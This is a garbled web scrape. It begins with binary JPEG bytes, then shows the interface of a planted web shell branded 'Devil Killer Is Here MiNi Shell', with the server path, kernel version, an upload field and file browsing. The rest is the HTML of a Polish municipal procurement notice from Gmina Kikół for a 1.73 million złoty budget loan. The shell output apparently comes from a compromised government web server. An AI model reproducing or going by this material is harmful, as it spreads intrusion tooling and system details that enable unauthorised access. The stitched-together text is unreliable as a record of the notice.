JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230425/0019090701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie i obsługa kredytu na pokrycie planowanego deficytu budżetu z przeznaczeniem na realizację przedsięwzięć inwestycyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kikół</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866548</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Kościuszki 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kikół</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">542894670</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">542894670</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@kikol.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kikol.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie i obsługa kredytu na pokrycie planowanego deficytu budżetu z przeznaczeniem na realizację przedsięwzięć inwestycyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ca8ad9b9-e341-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00190907</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00006396/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Udzielenie i obsługa kredytu na pokrycie planowanego deficytu budżetu z przeznaczeniem na realizację przedsięwzięć inwestycyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kikol <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/kikol</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ogólne<br/>zasady korzystania z Platformy, z zastrzeżeniem ust. 2 niniejszego rozdziału:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Platformy na subdomenie<br/>https://waganiec.ezamawiajacy.pl/servlet/HomeServlet, lub https://oneplace.marketplanet.pl, 2)<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się&#34;, 3) rejestracja Wykonawcy trwa maksymalnie do 2 dni<br/>roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na<br/>rejestrację w procesie złożenia oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem<br/>złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia<br/>konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu,<br/>4) po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>2. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na<br/>Platformie tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux,<br/>lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3. Zamawiający dopuszcza przesyłanie plików o wielkości do 100 MB.<br/>4. Zalecenia Zamawiającego dotyczące:<br/>1) kwalifikowanego podpisu elektronicznego:<br/>a) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES (pdf advanced electronic<br/>signature),<br/>b) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES (HML pdf advanced<br/>electronic signature).<br/>2) podpisu zaufanego:<br/>a) wielkość pliku nie może przekraczać 10 MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis formatem PAdES;<br/>Podpisany plik ma rozszerzenie .pdf,<br/>c) dla dokumentów w formacie innym niż .pdf zaleca się podpis formatem XAdES. Podpisany plik ma<br/>rozszerzenie .xml.<br/>3) podpisu osobistego:<br/>a) w przypadku wykorzystania aplikacji eDO Atp (obsługuje tylko dokumenty w formacie .pdf) na<br/>telefonach z obsługą technologii NFC wielkość dokumentów nie może przekroczyć 5MB,<br/>b) dla dokumentów w formacie .pdf zaleca się podpis wewnętrzny otoczony,<br/>c) dokumenty w formacie innym niż .pdf zaleca się podpisywać podpisem zewnętrznym lub<br/>otaczającym.<br/>4) Po podpisaniu plików a przed ich załączeniem na Platformę zaleca się dokonanie weryfikacji<br/>kompletności i poprawności wszystkich złożonych podpisów (w szczególności gdy dokument został<br/>podpisany przez kilku reprezentantów lub przy wykorzystaniu różnych podpisów). W przypadku<br/>korzystania z wariantu składania podpisów zewnętrznych konieczne jest załączenie na Platformę<br/>dwóch plików, tj. pliku podpisywanego i pliku zawierającego podpis.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik/pliki oferty załączony/e przez Wykonawcę na Platformie i zapisany/e, widoczny/e jest/są na<br/>Platformie jako zaszyfrowany/e – format kodowania UTF8. Możliwość otworzenia pliku/ów dostępna<br/>jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert,<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.<br/>Pozostałe informacje zamieszczone są w Rozdziale XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych), zwane dalej „RODO” informuje się, że:<br/>1) administratorem danych osobowych jest Wójt Gminy Kikół Plac Kościuszki 7, 87-620 Kikól<br/>2) Wyznaczono inspektora ochrony danych, z którym można się kontaktować pisemnie na adres: Urząd Gminy w Kikole lub iodo@kikol.pl .<br/>3) Pani / Pana dane będą przetwarzane w oparciu o art. 6 ust. 1 lit. c RODO (Dz.U.UE.L.2016.119.1 z 04.05.2016 r. ze zm.) w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia<br/>11.09.2019 r. Prawo zamówień publicznych.<br/>4) Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o przepisy ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (art. 18, art. 74), jak również inne podmioty<br/>upoważnione do odbioru danych osobowych na podstawie przepisów prawa lub zawartych z Administratorem umów, w tym<br/>podmioty zajmujące się obsługą informatyczną Administratora.<br/>5) Dane po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane do celów archiwalnych i przechowywane przez<br/>okres niezbędny do zrealizowania przepisów dotyczących archiwizowania danych obowiązujących u Administratora lub okresu<br/>trwałości projektu w przypadku otrzymania dofinansowania ze środków zewnętrznych.<br/>6) Zamawiający informuje, że będzie przetwarzał dane osobowe w zakresie wskazanym w otrzymanej ofercie, dokumentach<br/>składanych przez wykonawcę oraz w publicznie dostępnych rejestrach i bazach danych np. CEIDG, KRS (art. 14 ust. 1 lit. d, art. 14</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych, które są nieprawidłowe oraz prawo do<br/>uzupełnienia Pani/Pana danych osobowych, które są niekompletne. Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz<br/>nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa, w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO.<br/>8) Obowiązek podania przez Panią / Pana danych osobowych Zamawiającemu jest wymogiem związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>9) Dane osobowe nie będą przetwarzane w sposób opierający się na zautomatyzowanym przetwarzaniu. Decyzje nie będą<br/>podejmowane w sposób zautomatyzowany.<br/>10) Nie przysługuje Pani / Panu:<br/>a) prawo do przenoszenia danych osobowych,<br/>b) prawo do wycofania zgody na przetwarzanie danych osobowych,<br/>c) prawo do wniesienia sprzeciwu wobec przetwarzania danych,<br/>d) prawo do usunięcia danych osobowych,</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.TP.271.07.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest udzielenie Gminie Kikół kredytu w łącznej wysokości 1 732 712,76 zł (słownie złotych: jeden milion siedemset trzydzieści dwa tysiące siedemset dwanaście złotych 76/100). Kredyt Gmina Kikół zamierza przeznaczyć na pokrycie planowanego deficytu budżetu z przeznaczeniem na realizację przedsięwzięć inwestycyjnych oraz spłatę wcześniej zaciągniętych zobowiązań.<br/>2.	Kwota kredytu: 1 732 712,76 zł. <br/>Spłata kredytu nastąpi odpowiednio:<br/>- w roku 2024 – 15 000,00 zł<br/>- w roku 2025 – 70 000,00 zł,<br/>- w roku 2026 – 30 000,00 zł,<br/>- w roku 2027 – 100 000,00 zł,<br/>- w roku 2028 – 200 000,00 zł,<br/>- w roku 2029 - 200 000,00 zł,<br/>- w roku 2030 – 200 000,00 zł, <br/>- w roku 2031 – 250 000,00 zł,<br/>- w roku 2032 – 250 000,00 zł<br/>- w roku 2033 – 417 712,76 zł<br/>Spłata rat następowała będzie w okresie rocznym, na koniec każdego roku w ostatnim dniu roboczym roku. <br/>3.	Karencja w spłacie rat kapitałowych – do dnia 30.12.2024 roku (data spłaty pierwszej raty kwartalnej).<br/>4.	Spłata odsetek następować będzie w ratach kwartalnych, na koniec każdego kwartału danego roku, w ostatnim dniu roboczym kwartału, począwszy od kwartału, w którym zostanie uruchomiony kredyt.<br/>5.	Uruchomienie kredytu nastąpi na pisemny wniosek Zamawiającego (Kredytobiorcy) złożony Wykonawcy (Kredytodawcy) dzień przed planowaną wypłatą kredytu na rachunek Gminy Kikół wskazany w umowie.<br/>6.	Do obliczenia ceny oferty przyjąć należy stawkę referencyjną WIBOR 1M (Warsaw Interbank Offered Rate – oprocentowanie po jakim banki udzielą pożyczek innym bankom, ustalane o godz. 11:00 – obowiązujące w dniu 24.04.2023 r. (tj.6,66 %), + stała marża banku (marża banku może być również ujemna).<br/>7.	Zmiana oprocentowania kredytu będzie następować zgodnie ze zmianą stawki referencyjnej WIBOR 1M liczonej jako średnia arytmetyczna z pięciu ostatnich kwotowań w miesiącu poprzedzającym miesiąc naliczenia odsetek, tj. pierwszego dnia każdego miesiąca. <br/>8.	Zabezpieczeniem spłaty kredytu będzie weksel własny in blanco z deklaracją wekslową. <br/>9.	Zamawiający zastrzega sobie: <br/>1)	wybrany Wykonawca (bank) nie będzie rozliczał Zamawiającego z wykorzystania kredytu, <br/>2) prawo wcześniejszej spłaty kredytu bez dodatkowych kosztów związanych z wcześniejszą spłatą, <br/>3)	odsetki będą naliczane wyłącznie od kapitału niespłaconego i płatne w okresach kwartalnych również w okresie karencji,<br/>4)	bank nie może uzależnić udzielenia kredytu od przejęcia bankowej obsługi budżetu Zamawiającego.<br/>10.	Zamawiający wyraża zgodę na zastosowanie do wyliczenia ceny jak i w umowie kredytowej kalendarza rzeczywistego (365/366 dni).<br/>11.	Dokumenty finansowe stanowią załącznik nr 5 do SWZ.<br/>12.	Wspólny Słownik Zamówień (CPV): 66113000-5.<br/>13.	Zamawiający na podstawie art. 95 ust. 1 ustawy Pzp wymaga, aby wszystkie czynności polegające na faktycznym wykonywaniu usług stanowiących przedmiot zamówienia, były wykonywane przez osoby zatrudnione przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę w rozumieniu przepisów art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst jednolity: Dz. U. z 2020 r., poz. 1320 ze zm.): „Przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca – do zatrudniania pracownika za wynagrodzeniem”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66113000-5 - Usługi udzielania kredytu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2033-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteriami wyboru najkorzystniejszej oferty są:<br/>Cena brutto oferty – 100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1 nie podlegają wykluczeniu;<br/>1.2 spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1 Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.2.2 Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada<br/>uprawnienia do wykonywania czynności bankowych, zgodnie z ustawą z dnia 29 sierpnia 1997 r.<br/>Prawo bankowe (test jednolity: Dz. U. z 2020 r., poz. 1896 ze zm.), a w przypadku określonym w<br/>art. 178 ust.1 ustawy Prawo bankowe inny dokument<br/>potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w<br/>art. 193 ustawy Prawo bankowe.<br/>UWAGA!<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek<br/>zostanie spełniony, gdy uprawnienie będzie posiadał co najmniej jeden z konsorcjantów, który<br/>będzie realizował tę część zamówienia, z którą wiąże się obowiązek posiadania uprawnień.<br/>1.2.3 Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.2.4 Zdolności technicznej i zawodowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie<br/>zamówienia Wykonawca składa:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym<br/>Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie<br/>od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór stanowi Załącznik nr 4 do<br/>SWZ);<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w<br/>postępowaniu Wykonawca składa:<br/>a) zezwolenie, koncesję, licencję lub potwierdzenie wpisu do rejestru działalności regulowanej, jeżeli<br/>ich podsiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym Wykonawca ma<br/>siedzibę lub miejsce zamieszkania.<br/>(uprawnienia do wykonywania czynności bankowych, zgodnie z ustawą z dnia 29 sierpnia 1997 r.<br/>Prawo bankowe (test jednolity: Dz. U. z 2020 r., poz. 1896 ze zm.), a w przypadku określonym w art.<br/>178 ust.1 ustawy Prawo bankowe inny dokument<br/>potwierdzający rozpoczęcie działalności przed dniem wejścia w życie 